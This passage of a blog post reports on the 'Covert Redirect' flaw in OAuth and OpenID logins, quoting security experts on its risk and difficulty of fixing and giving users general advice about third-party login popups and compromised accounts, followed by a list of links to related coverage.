<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Covert Redirect appears to exist in the implementations of the OpenID and OAuth standards used on client websites and apps. But because these two standards are open-source and were developed by a group of volunteers, there's no company or dedicated team that could devote itself to fixing the issue.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b>Where does that leave things? </b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
"Given the trust users put in Facebook and other major OAuth providers, I think it will be easy for attackers to trick people into giving some access to their personal information stored on those services," Chris Wysopal, chief technology officer of Boston-area security firm Veracode and a member of the legendary 1990s hackerspace the L0pht, told CNET.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
"It's not easy to fix, and any effective remedies would negatively impact the user experience," Jeremiah Grossman, founder of Santa Clara, Calif.-based WhiteHat Security, told CNET. "Just another example that Web security is fundamentally broken and the powers that be have little incentive to address the inherent flaws."</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
Users should be extra wary of login popups on Web pages. If you wish to log into a given website, it might be better to use an account specific to that website instead of logging in with Facebook, Twitter, or another authentication company, since that kind of login relies on OAuth and/or OpenID.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
If you think someone has gained access to one of your online accounts, notify the service and change that account's password immediately.</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b>Related Articles:</b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.tomsguide.com/us/facebook-google-covert-redirect-flaw,news-18726.html">http://www.tomsguide.com/us/facebook-google-covert-redirect-flaw,news-18726.html</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.scmagazine.com/covert-redirect-vulnerability-impacts-oauth-20-openid/article/345407/">http://www.scmagazine.com/covert-redirect-vulnerability-impacts-oauth-20-openid/article/345407/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://news.yahoo.com/facebook-google-users-threatened-security-192547549.html">http://news.yahoo.com/facebook-google-users-threatened-security-192547549.html</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://thehackernews.com/2014/05/nasty-covert-redirect-vulnerability.html">http://thehackernews.com/2014/05/nasty-covert-redirect-vulnerability.html</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.foxnews.com/tech/2014/05/05/facebook-google-users-threatened-by-new-security-flaw/">http://www.foxnews.com/tech/2014/05/05/facebook-google-users-threatened-by-new-security-flaw/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://whitehatview.tumblr.com/post/120695795041">http://whitehatview.tumblr.com/post/120695795041</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://russiapost.blogspot.ru/2015/05/openid-oauth-20.html">http://russiapost.blogspot.ru/2015/05/openid-oauth-20.html</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://diebiyi.com/articles/security/covert-redirect/covert_redirect/">http://www.diebiyi.com/articles/security/covert-redirect/covert_redirect/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://whitehatpost.lofter.com/post/1cc773c8_706b622">http://whitehatpost.lofter.com/post/1cc773c8_706b622</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://itswift.wordpress.com/2014/05/06/microsoft-google-facebook-attacked/">https://itswift.wordpress.com/2014/05/06/microsoft-google-facebook-attacked/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/2346030512015420103814617/">http://tetraph.blog.163.com/blog/static/2346030512015420103814617/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://itsecurity.lofter.com/post/1cfbf9e7_72e2dbe">http://itsecurity.lofter.com/post/1cfbf9e7_72e2dbe</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://ithut.tumblr.com/post/119493304233/securitypost-une-faille-dans-lintegration">http://ithut.tumblr.com/post/119493304233/securitypost-une-faille-dans-lintegration</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://japanbroad.blogspot.jp/2015/05/oauthopenid-facebook.html">http://japanbroad.blogspot.jp/2015/05/oauthopenid-facebook.html</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://webtech.lofter.com/post/1cd3e0d3_6f0f291">http://webtech.lofter.com/post/1cd3e0d3_6f0f291</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://webtechwire.wordpress.com/2014/05/11/covert-redirect-attack-worldwide/">https://webtechwire.wordpress.com/2014/05/11/covert-redirect-attack-worldwide/</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://whitehatview.tumblr.com/post/119489968576/securitypost-sicherheitslucke-in-oauth-2-0-und">http://whitehatview.tumblr.com/post/119489968576/securitypost-sicherheitslucke-in-oauth-2-0-und</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/computer-security/facebook-google-attack/">http://www.inzeed.com/kaleidoscope/computer-security/facebook-google-attack/</a></div>